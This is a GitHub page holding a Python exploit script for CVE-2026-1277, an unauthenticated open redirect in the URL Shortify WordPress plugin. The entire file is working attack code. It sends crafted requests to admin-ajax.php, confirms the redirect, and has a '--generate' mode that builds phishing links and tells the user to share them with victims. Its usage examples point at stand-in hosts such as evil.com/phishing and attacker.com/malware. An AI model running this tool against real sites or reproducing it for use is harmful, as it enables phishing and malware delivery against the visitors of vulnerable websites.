Exploit-Hub/CVE-2026-1277.py at main · fs0ci5ty/Exploit-Hub · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
#!/usr/bin/env python3
"""
[*] CVE-2026-1277 - URL Shortify <= 1.12.1 Open Redirect Exploit
[*] Vulnerability: Unauthenticated Open Redirect via redirect_to parameter
[*] CVSS: 4.7 (Medium) | CWE-601: URL Redirection to Untrusted Site
[*] Made By Fsociety
"""

import requests
import argparse
import sys
from urllib.parse import urljoin, urlparse
from urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

# Banner
def banner():
    print(r"""
╔════════════════════════════════════════════════╗
║  CVE-2026-1277 Exploit - URL Shortify Redirect ║
║  WordPress Plugin <= 1.12.1                    ║
║  Unauthenticated Open Redirect                 ║
║  Made By Fsociety                              ║
╚════════════════════════════════════════════════╝
    """)

def check_redirect(target, redirect_url, option_name, verify=False):
    """
    Test for CVE-2026-1277 Open Redirect

    Args:
        target: WordPress site URL
        redirect_url: URL to redirect to (for testing)
        option_name: Notice option to test (bfcm_2025_offer or welcome_offer)
        verify: Verify SSL certificates
    """

    ajax_url = f"{target.rstrip('/')}/wp-admin/admin-ajax.php"

    params = {
        "action": "heartbeat",
        "kc_us_dismiss_admin_notice": "1",
        "option_name": option_name,
        "redirect_to": redirect_url
    }

    try:
        resp = requests.get(
            ajax_url,
            params=params,
            verify=verify,
            timeout=10,
            allow_redirects=False  # Don't follow, just check Location header
        )

        location = resp.headers.get("Location", "")

        if location and redirect_url.lower() in location.lower():
            print(f"[✓] Open Redirect confirmed!")
            print(f"    Option: {option_name}")
            print(f"    Redirects to: {location}")
            return True
        elif location:
            print(f"[?] Redirect detected but mismatch: {location}")
            return False
        else:
            print(f"[-] No redirect header (HTTP {resp.status_code})")
            return False

    except requests.exceptions.RequestException as e:
        print(f"[-] Connection error: {e}")
        return False


def generate_phishing_link(target, malicious_url, option_name="welcome_offer"):
    """Generate a malicious redirect link for demonstration"""

    ajax_url = f"{target.rstrip('/')}/wp-admin/admin-ajax.php"

    params = {
        "action": "heartbeat",
        "kc_us_dismiss_admin_notice": "1",
        "option_name": option_name,
        "redirect_to": malicious_url
    }

    # Build query string
    query = "&".join(f"{k}={v}" for k, v in params.items())
    return f"{ajax_url}?{query}"


def main():
    banner()

    parser = argparse.ArgumentParser(
        description="CVE-2026-1277: URL Shortify Open Redirect Exploit",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  %(prog)s -t http://target.com --check
  %(prog)s -t http://target.com -r https://evil.com/phishing
  %(prog)s -t http://target.com --generate https://attacker.com/malware
  %(prog)s -t https://target.com -k
        """
    )

    parser.add_argument("-t", "--target", required=True, help="Target WordPress URL")
    parser.add_argument("--check", action="store_true", help="Check vulnerability with test domain")
    parser.add_argument("-r", "--redirect", help="Test redirect to specific malicious URL")
    parser.add_argument("--generate", metavar="URL", help="Generate phishing link to URL")
    parser.add_argument("-o", "--option", default="welcome_offer",
                       choices=["welcome_offer", "bfcm_2025_offer"],
                       help="Notice option name (default: welcome_offer)")
    parser.add_argument("-k", "--insecure", action="store_true", help="Disable SSL verification")

    args = parser.parse_args()
    verify = not args.insecure

    # Generate link mode
    if args.generate:
        link = generate_phishing_link(args.target, args.generate, args.option)
        print(f"[+] Generated malicious link:")
        print(f"    {link}")
        print(f"\n[!] Share this link to redirect victims to: {args.generate}")
        sys.exit(0)

    # Check mode with interact.sh style test
    if args.check:
        test_url = "https://interact.sh"
        print(f"[*] Testing with redirect to: {test_url}")
        if check_redirect(args.target, test_url, args.option, verify):
            print(f"\n[!] Target {args.target} is VULNERABLE to CVE-2026-1277")
            sys.exit(0)
        else:
            print(f"\n[-] No open redirect detected")
            sys.exit(1)

    # Custom redirect test
    if args.redirect:
        print(f"[*] Testing redirect to: {args.redirect}")
        if check_redirect(args.target, args.redirect, args.option, verify):
            print(f"\n[✓] Redirect successful - vulnerability confirmed")
            sys.exit(0)
        else:
            print(f"\n[-] Redirect test failed")
            sys.exit(1)

    # Default: show help
    print("[!] Use --check to test vulnerability or -r/--redirect to test custom URL")
    print("[!] Example: python3 CVE-2026-1277.py -t http://target.com --check")
    sys.exit(1)


if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        print("\n[!] Interrupted by user")
        sys.exit(130)